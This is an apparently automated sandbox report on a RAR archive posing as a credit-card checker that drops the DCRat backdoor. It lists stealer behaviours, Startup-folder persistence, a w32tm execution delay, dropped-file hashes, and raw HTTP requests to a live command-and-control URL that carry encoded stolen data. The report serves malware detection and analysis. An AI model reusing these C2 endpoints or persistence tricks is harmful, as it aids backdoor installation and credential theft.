File name:

CC Checker AcTeam.rar

Full analysis: https://app.any.run/tasks/99eeef0e-ce34-45c1-9ade-ceffdff67913
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: March 08, 2024, 19:41:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
backdoor
dcrat
remote
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

D8DE0B926EA0883F87F9B60DA87CF9B4

SHA1:

164CF49F3B1B102093462AA1D9779DE3D9784EC2

SHA256:

A04D857DA7CB6E0FA737CD7F01C2F52285E3716C529134EE4D1D90042CD516EA

SSDEEP:

98304:bNLUw5K1HhV4DPMhsqhk4ImAedeaAybpUibTSVc4AQ3bBlNOdb49r9gcdRTrWKj7:B5KmOyfF/EHrQUZEYVymk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_update.exe (PID: 3708)
      • WinRAR.exe (PID: 3672)

    • Create files in the Startup directory

      • ms_update.exe (PID: 3708)

    • DCRAT has been detected (SURICATA)

      • ms_updater.exe (PID: 2124)

    • Connects to the CnC server

      • ms_updater.exe (PID: 2124)

    • Steals credentials from Web Browsers

      • ms_updater.exe (PID: 2124)

    • Steals credentials

      • ms_updater.exe (PID: 2124)

    • Actions looks like stealing of personal data

      • ms_updater.exe (PID: 2124)

  • SUSPICIOUS

    • The process creates files with name similar to system file names

      • WinRAR.exe (PID: 3672)

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 3672)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3672)
      • CC Checker AcTeam.exe (PID: 3692)
      • ms_updater.exe (PID: 2124)

    • Executable content was dropped or overwritten

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_update.exe (PID: 3708)

    • Reads the Internet Settings

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_updater.exe (PID: 2124)

    • Reads settings of System Certificates

      • ms_updater.exe (PID: 2124)

    • Starts CMD.EXE for commands execution

      • ms_updater.exe (PID: 2124)

    • Reads browser cookies

      • ms_updater.exe (PID: 2124)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 1792)

    • Loads DLL from Mozilla Firefox

      • ms_updater.exe (PID: 2124)

    • Executing commands from a ".bat" file

      • ms_updater.exe (PID: 2124)

  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3672)

    • Checks supported languages

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_updater.exe (PID: 2124)
      • ms_update.exe (PID: 3708)
      • CC Checker AcTeam.exe (PID: 2724)
      • CC Checker AcTeam.exe (PID: 2292)
      • CC Checker AcTeam.exe (PID: 128)
      • CC Checker AcTeam.exe (PID: 952)
      • CC Checker AcTeam.exe (PID: 4080)
      • wmpnscfg.exe (PID: 2348)
      • CC Checker AcTeam.exe (PID: 3900)
      • CC Checker AcTeam.exe (PID: 1736)
      • CC Checker AcTeam.exe (PID: 1820)
      • CC Checker AcTeam.exe (PID: 3152)
      • CC Checker AcTeam.exe (PID: 4084)
      • CC Checker AcTeam.exe (PID: 1424)
      • CC Checker AcTeam.exe (PID: 3564)
      • CC Checker AcTeam.exe (PID: 2548)
      • CC Checker AcTeam.exe (PID: 2416)
      • CC Checker AcTeam.exe (PID: 3456)
      • CC Checker AcTeam.exe (PID: 2740)

    • Creates files or folders in the user directory

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_update.exe (PID: 3708)

    • Reads the computer name

      • CC Checker AcTeam.exe (PID: 3692)
      • ms_update.exe (PID: 3708)
      • ms_updater.exe (PID: 2124)
      • wmpnscfg.exe (PID: 2348)

    • Reads the machine GUID from the registry

      • ms_update.exe (PID: 3708)
      • ms_updater.exe (PID: 2124)

    • Reads product name

      • ms_updater.exe (PID: 2124)

    • Reads Environment values

      • ms_updater.exe (PID: 2124)

    • Reads the software policy settings

      • ms_updater.exe (PID: 2124)

    • Manual execution by a user

      • CC Checker AcTeam.exe (PID: 2724)
      • wmpnscfg.exe (PID: 2348)
      • CC Checker AcTeam.exe (PID: 952)
      • CC Checker AcTeam.exe (PID: 4080)
      • CC Checker AcTeam.exe (PID: 3900)
      • CC Checker AcTeam.exe (PID: 3152)
      • CC Checker AcTeam.exe (PID: 1820)
      • CC Checker AcTeam.exe (PID: 4084)
      • CC Checker AcTeam.exe (PID: 3564)
      • CC Checker AcTeam.exe (PID: 1736)
      • CC Checker AcTeam.exe (PID: 3456)
      • CC Checker AcTeam.exe (PID: 2548)
      • CC Checker AcTeam.exe (PID: 1424)
      • CC Checker AcTeam.exe (PID: 2740)
      • CC Checker AcTeam.exe (PID: 2416)

    • Create files in a temporary directory

      • ms_updater.exe (PID: 2124)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
75
Monitored processes
25
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe cc checker acteam.exe ms_update.exe ms_updater.exe no specs #DCRAT ms_updater.exe cc checker acteam.exe cc checker acteam.exe cmd.exe no specs w32tm.exe no specs cc checker acteam.exe wmpnscfg.exe no specs cc checker acteam.exe cc checker acteam.exe cc checker acteam.exe no specs cc checker acteam.exe cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs cc checker acteam.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
128"C:\Users\admin\AppData\Local\Temp\Rar$EXa3672.39600\CC Checker AcTeam.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3672.39600\CC Checker AcTeam.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226519
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa3672.39600\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
952"C:\Users\admin\Desktop\CC Checker AcTeam.exe" C:\Users\admin\Desktop\CC Checker AcTeam.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226519
Modules
Images
c:\users\admin\desktop\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1424"C:\Users\admin\Desktop\CC Checker AcTeam.exe" C:\Users\admin\Desktop\CC Checker AcTeam.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1736"C:\Users\admin\Desktop\CC Checker AcTeam.exe" C:\Users\admin\Desktop\CC Checker AcTeam.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1792C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\szJZ53yiS2.bat" "C:\Windows\System32\cmd.exems_updater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1820"C:\Users\admin\Desktop\CC Checker AcTeam.exe" C:\Users\admin\Desktop\CC Checker AcTeam.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2124"C:\Users\admin\AppData\Roaming\ms_updater.exe" C:\Users\admin\AppData\Roaming\ms_updater.exe
CC Checker AcTeam.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
2172w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 C:\Windows\System32\w32tm.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2292"C:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\CC Checker AcTeam.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\CC Checker AcTeam.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226519
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa3672.37907\cc checker acteam.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2348"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
14 613
Read events
14 535
Write events
75
Delete events
3

Modification events

(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3672) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\CC Checker AcTeam.rar
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3672) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
17
Suspicious files
24
Text files
7
Unknown types
2

Dropped files

PID
Process
Filename
Type
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37260\dnscmmc.dllexecutable
MD5:BDC7EAD1E9B59A54F61AD53EC7FEFFFB
SHA256:4F64DC86D26FF64F037EEA6FE2E8F7224A8F5988C132EBF617EC6A562080FB01
3692CC Checker AcTeam.exeC:\Users\admin\AppData\Roaming\ms_update.exeexecutable
MD5:8597488355F310BC0046FD9F3EB87C6B
SHA256:9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5
3692CC Checker AcTeam.exeC:\Users\admin\AppData\Roaming\ms_updater.exeexecutable
MD5:5CEE940B52DA0E967FECB1133B6304D0
SHA256:0CBC0042EA0C1F235C35CFC40A62D29A5D794535FA164DFB57F7B90334FFE767
3708ms_update.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exeexecutable
MD5:8597488355F310BC0046FD9F3EB87C6B
SHA256:9FA04A8D42F65ABDD06306941A8E83078BB74F70C508FB8030586759A6D408E5
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37260\CC Checker AcTeam.exeexecutable
MD5:61A53A1D3A59B7807043D94B1C5E4655
SHA256:095304BEE099B1866DDA4831AEADA70DE677385CAEA1F9F9886569A8F21C806F
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\dnscmmc.dllexecutable
MD5:BDC7EAD1E9B59A54F61AD53EC7FEFFFB
SHA256:4F64DC86D26FF64F037EEA6FE2E8F7224A8F5988C132EBF617EC6A562080FB01
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\dmview.ocxexecutable
MD5:9D3D06D04B20C9A61394144DCCF7E54C
SHA256:F11DF95FAE783DDFD452A888BEDAC3B084405CABE20F36BE26000A1738D97C9F
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\elshyph.dllexecutable
MD5:6886E3F01425562C23467DA967B643FE
SHA256:367322687653B2D0836473FB1B863275E276A5B2AAE5C494FC5F786CF52AB471
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3672.38097\CC Checker AcTeam.exeexecutable
MD5:61A53A1D3A59B7807043D94B1C5E4655
SHA256:095304BEE099B1866DDA4831AEADA70DE677385CAEA1F9F9886569A8F21C806F
3672WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3672.37907\CC Checker AcTeam.exeexecutable
MD5:61A53A1D3A59B7807043D94B1C5E4655
SHA256:095304BEE099B1866DDA4831AEADA70DE677385CAEA1F9F9886569A8F21C806F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
9
DNS requests
3
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?pKuVZPAMJ5G3pF=3BvB63waEtcZG&BeVOYxXxQgUGChc2QNztX9ZLfg3t=m7z4UHaupQRAGuPrz0O8Mc&7d2ec6fa11a45062f73c3371e90be2d7=d2bcd0f2865f35a89899afe230c1002a&e95b42d7b0485703d17241e76e2b8585=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&pKuVZPAMJ5G3pF=3BvB63waEtcZG&BeVOYxXxQgUGChc2QNztX9ZLfg3t=m7z4UHaupQRAGuPrz0O8Mc
unknown
text
2.07 Kb
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&a05939b54e910a520ed16f4659e1d224=0VfiIiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&60fcc970050c21131ef204c321f6004c=d1nI5oUeaVHbXJGa50WVjhnVZBjRHJ1dChVUjhHbiBXMHpFa4ZEW6pEWapnVGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=d1nIiojIiF2NzIDO2QTZ4cjM2IWZjFmZwI2Y0gTO0MmYzgjM5UjIsISNyQDNhdTZyUWOyMWO0ATMxADOkhDZmlDMwETY1YmZwETNkZWM5gjNiojIzMTZ3UDM1MzNyUmMlJTMmFjN4kDZlBTNyEmMxkTOlBjIsIiMhdjNiZ2NzAjYlhzNkRWN3YjYxYDNmBjMllzNhFDO5gzMkJmMxkTOiojIiRmY0cTYxkjN3E2MmBDZhFmYmFzNyQWZkBDOiVGNiJmI7xSfikTMul0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0NwpWSoJFWZVkUIVGbKNETx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSp50dFpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0ETZ2kTOyEGZzczNkBzM1QmZ4ETOlNWMzgTMxAjNmdjNiVGMwUWYzIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2124
ms_updater.exe
GET
200
188.114.96.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?2riXKVlgV1=JUk18ntWeDto2yehI8yOvj&VLkpjdj5=nrkCHcyD3VUNJCp&qydhhm6jGOqX8J25HR=KN&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyYDN3MTN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=d1nIiojIiF2NzIDO2QTZ4cjM2IWZjFmZwI2Y0gTO0MmYzgjM5UjIsISNyQDNhdTZyUWOyMWO0ATMxADOkhDZmlDMwETY1YmZwETNkZWM5gjNiojIzMTZ3UDM1MzNyUmMlJTMmFjN4kDZlBTNyEmMxkTOlBjIsIiMhdjNiZ2NzAjYlhzNkRWN3YjYxYDNmBjMllzNhFDO5gzMkJmMxkTOiojIiRmY0cTYxkjN3E2MmBDZhFmYmFzNyQWZkBDOiVGNiJmI7xSfikTMul0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0NwpWSoJFWZVkUIVGbKNETx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSp50dFpGT0ElaMNTRqxEMn